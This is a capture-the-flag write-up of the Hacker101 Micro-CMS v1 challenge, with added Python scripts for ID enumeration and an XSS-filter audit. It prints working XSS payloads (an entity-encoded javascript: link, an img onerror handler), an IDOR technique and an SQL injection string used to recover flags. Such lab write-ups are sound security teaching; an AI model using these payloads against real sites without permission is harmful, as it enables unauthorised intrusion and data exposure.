Micro-CMS V1 - Hacker101 CTF

Understanding how the website works

We are greeted by a home page that lists all existing pages and offers the ability to create new ones.

<!doctype html>
<html>
    <head>
        <title>Micro-CMS</title>
    </head>
    <body>
        <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
        </ul>
        <a href="page/create">Create a new page</a>
    </body>
</html>

Nothing special in the source.

On visiting the first page we can see that we also have the ability to edit pages, via:

/page/edit/1

On editing the page we see that Markdown is supported, but script tags are not: they get scrubbed from the saved content.

Page 2 has the following content:

Just testing some markdown functionality.

![adorable kitten](https://static1.squarespace.com/static/54e8ba93e4b07c3f655b452e/t/56c2a04520c64707756f4267/1493764650017/)

<button>Some button</button>

Trying to create a page via /page/create:

The new page appears in the home page listing alongside the other pages. Since the listing is built from what we submitted, the pages must be stored and read back from some persistent store (a database).

<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
<li><a href="page/10">test</a></li>

The odd thing is that the new page got ID 10 (page/10). Why not 3 or 4? The gap suggests IDs 3 to 9 were allocated at some point.

On enumerating the other /page/<id> values we discover that /page/7 returns 403 Forbidden, while the rest return 404 Not Found. A page that exists but is forbidden is exactly the kind of object an access-control bug would expose.

Editing/Creating a Page

On editing/creating a page, the form is POSTed with a body like:

title=test&body=test123%0D%0A%3Cp%3Ehello%3C%2Fp%3E%0D%0A%23%23%23+hello

URL-decoded, that is title=test and a body consisting of test123, <p>hello</p> and ### hello on separate lines. Both fields are plain text that the server stores and later renders.

If we try to post a body like:

test123
### hello

<a href=".">hello</a>

We get this:

<!doctype html>
<html>
    <head>
        <title>test##</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/10">Edit this page</a>
        <h1>test##</h1>
<p>test123</p>
<h3>hello</h3>
<p><a href=".">hello</a></p>
    </body>
</html>

The anchor tag is wrapped in a <p> tag but otherwise passed through untouched: raw HTML in the body survives the Markdown rendering without being escaped.

First Flag

The title of a page is another injection point. Setting it to <h1>test</h1> gives the following page source. Note that the view page HTML-encodes the title in both the <title> and the <h1> element (&lt;h1&gt;), whereas body content such as the <h1>heading 1</h1> at the bottom is passed through unescaped.

<!doctype html>
<html>
    <head>
        <title>&lt;h1&gt;test&lt;/h1&gt;</title>
    </head>
    <body>
        <a href="../">&lt;-- Go Home</a><br>
        <a href="edit/10">Edit this page</a>
        <h1>&lt;h1&gt;test&lt;/h1&gt;</h1>
<p>test123</p>
<h3>hello</h3>
<p><a href=".">hello</a></p>
<h1>heading 1</h1>
    </body>
</html>

Second Flag

Since we can edit pages such as /page/edit/10 just by specifying the ID in the URL, there is a possibility of an IDOR (insecure direct object reference) vulnerability.

/page/7 gave us a 403. We could try 403 bypass tricks, which would be inefficient here, or we can simply request /page/edit/7. The edit endpoint does not apply the access check that the view endpoint does, so the forbidden page's content (and the flag) is served through the editor.
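To make the ID enumeration from earlier and the IDOR check repeatable, here is an added Python example (not part of the original writeup): it requests /page/<id> and /page/edit/<id> for a range of IDs and reports IDs that the view handler forbids but the edit handler serves. The base URL, the ID range and the offline fake responder (which mirrors what the writeup observed: pages 1, 2 and 10 exist, page 7 is forbidden on view) are assumptions; against a live instance, swap in http_status(...).

```python
"""Enumerate /page/<id> and /page/edit/<id> and flag IDs whose access
control differs between the two endpoints.

Added example, not part of the original writeup. The base URL, the ID
range and the fake responder below are assumptions for illustration.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

Fetch = Callable[[str], int]  # path -> HTTP status code


def http_status(base_url: str) -> Fetch:
    """Build a fetcher returning the HTTP status code for base_url + path.

    Assumed for illustration: the target answers 403/404 for blocked and
    missing pages, as the writeup observed for /page/7 and the others.
    """
    def fetch(path: str) -> int:
        req = urllib.request.Request(base_url + path, method="GET")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code
    return fetch


def enumerate_pages(fetch: Fetch, ids: Iterable[int]) -> Dict[int, Tuple[int, int]]:
    """Return {id: (view_status, edit_status)} for every id in ids."""
    results: Dict[int, Tuple[int, int]] = {}
    for page_id in ids:
        view = fetch(f"/page/{page_id}")
        edit = fetch(f"/page/edit/{page_id}")
        results[page_id] = (view, edit)
    return results


def idor_candidates(results: Dict[int, Tuple[int, int]]) -> List[int]:
    """IDs that the view endpoint forbids but the edit endpoint serves.

    A 403 on /page/<id> together with a 200 on /page/edit/<id> means the
    authorization check lives in one handler and not the other: the
    direct-object-reference inconsistency the writeup exploits.
    """
    return sorted(pid for pid, (view, edit) in results.items()
                  if view == 403 and edit == 200)


def interesting(results: Dict[int, Tuple[int, int]]) -> List[int]:
    """IDs that exist in some form (anything other than 404 on both endpoints)."""
    return sorted(pid for pid, (view, edit) in results.items()
                  if not (view == 404 and edit == 404))


# Constructed offline responder mirroring what the writeup observed:
# pages 1, 2 and 10 exist, page 7 is forbidden on view but served by the
# editor, every other ID is missing.
def fake_fetch(path: str) -> int:
    if path == "/page/7":
        return 403
    page_id = int(path.rsplit("/", 1)[1])
    return 200 if page_id in (1, 2, 7, 10) else 404


if __name__ == "__main__":
    # Against a real instance: found = enumerate_pages(http_status("http://target.example"), range(1, 21))
    found = enumerate_pages(fake_fetch, range(1, 21))
    for pid in interesting(found):
        print(pid, "view/edit status:", found[pid])
    print("IDOR candidates (403 on view, 200 on edit):", idor_candidates(found))
```

The point of comparing the two endpoints per ID, rather than just listing 403s, is that a 403 alone only tells you an object exists; the 200 on the sibling endpoint is what proves the check is inconsistent.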

Markdown XSS

The scrubbing that removes script tags whenever we inject one into a page can be bypassed with a Markdown link whose URL is written as HTML hex character references; the browser decodes the references in the href, which gives us an XSS:

[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)

The payload was produced with an HTML encoder and decodes to javascript:alert('XSS'). This, however, doesn't get us a flag, which means it is an unintended path.

Third Flag

We can also get an XSS through an event-handler attribute, which the scrubber does not touch:

<img src=x onerror=alert('xss')>

Viewing the page source after saving this body reveals the flag.
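Both the entity-encoded link from the Markdown XSS section and the onerror payload from this section defeat a filter that inspects the raw text for <script> tags and the literal string javascript:. The following added Python example (not the CMS's code; the toy link renderer and both filters are assumptions about what such a filter does) shows why: the naive scrub leaves both payloads intact, while an audit that decodes character references before checking URL schemes, and that rejects on* attributes, flags both.

```python
"""Why the two XSS payloads from the writeup slip past a naive filter.

Added example, not the CMS's own code. The toy Markdown link renderer,
the naive scrub and the attribute audit are assumptions for illustration.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit

# Payloads copied from the writeup.
ENTITY_LINK = ("[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A"
               "&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)")
IMG_ONERROR = "<img src=x onerror=alert('xss')>"

_LINK = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")
_SCRIPT = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def render_link(markdown: str) -> str:
    """Toy stand-in for the Markdown renderer: turn [text](url) into <a>.

    Only link syntax is handled; raw HTML passes through untouched, matching
    what the writeup observed in the rendered page source.
    """
    return _LINK.sub(r'<a href="\2">\1</a>', markdown)


def naive_scrub(markup: str) -> str:
    """Assumed filter: strip <script> blocks and the literal 'javascript:'.

    It looks at the raw text before the browser decodes character
    references, so an entity-encoded scheme is invisible to it, and it never
    looks at attributes at all, so onerror= survives.
    """
    markup = _SCRIPT.sub("", markup)
    return re.sub(r"javascript:", "", markup, flags=re.IGNORECASE)


class _AttrAudit(HTMLParser):
    """Collect event-handler attributes and script-scheme URLs.

    HTMLParser decodes character references in attribute values before
    handing them to handle_starttag, so the check sees what the browser sees.
    """
    URL_ATTRS = {"href", "src", "action", "formaction"}
    SCRIPT_SCHEMES = {"javascript", "vbscript"}

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            lname = name.lower()
            value = (value or "").strip()
            if lname.startswith("on"):
                self.findings.append(f"<{tag}> event handler {lname}={value!r}")
            elif lname in self.URL_ATTRS:
                scheme = urlsplit(value).scheme.lower()
                if scheme in self.SCRIPT_SCHEMES:
                    self.findings.append(f"<{tag}> {lname} uses {scheme}: URL {value!r}")


def dangerous_markup(markup: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    audit = _AttrAudit()
    audit.feed(markup)
    audit.close()
    return audit.findings


def demo() -> Dict[str, dict]:
    """Run both payloads through the naive scrub, then audit what survives."""
    report = {}
    for label, payload in (("entity link", render_link(ENTITY_LINK)),
                           ("img onerror", IMG_ONERROR)):
        scrubbed = naive_scrub(payload)
        report[label] = {
            "survives_naive_scrub": scrubbed == payload,
            "findings": dangerous_markup(scrubbed),
        }
    return report


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

The audit is deliberately attribute-level rather than tag-level: the fix for both payloads is the same (decode first, then allowlist URL schemes and drop on* attributes), which is what a real sanitizer such as an allowlist-based HTML cleaner does, whereas stripping <script> is a denylist that the page's own markdown renderer had already shown to be insufficient.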

Fourth Flag

Since creating/editing a page persists and the page listing updates dynamically, we can deduce there is a database in the backend.

I spent a lot of time trying to get an SQLi on /page/<id>; however, it yielded nothing.

Fortunately, the same isn't the case for editing a page at /page/edit/<id>.

We get an SQLi by appending a payload right after the page id in the edit URL: /page/edit/<id>' OR 1=1. The edit handler evidently interpolates the id into its query rather than binding it as a parameter.


This post is licensed under CC BY 4.0 by the author.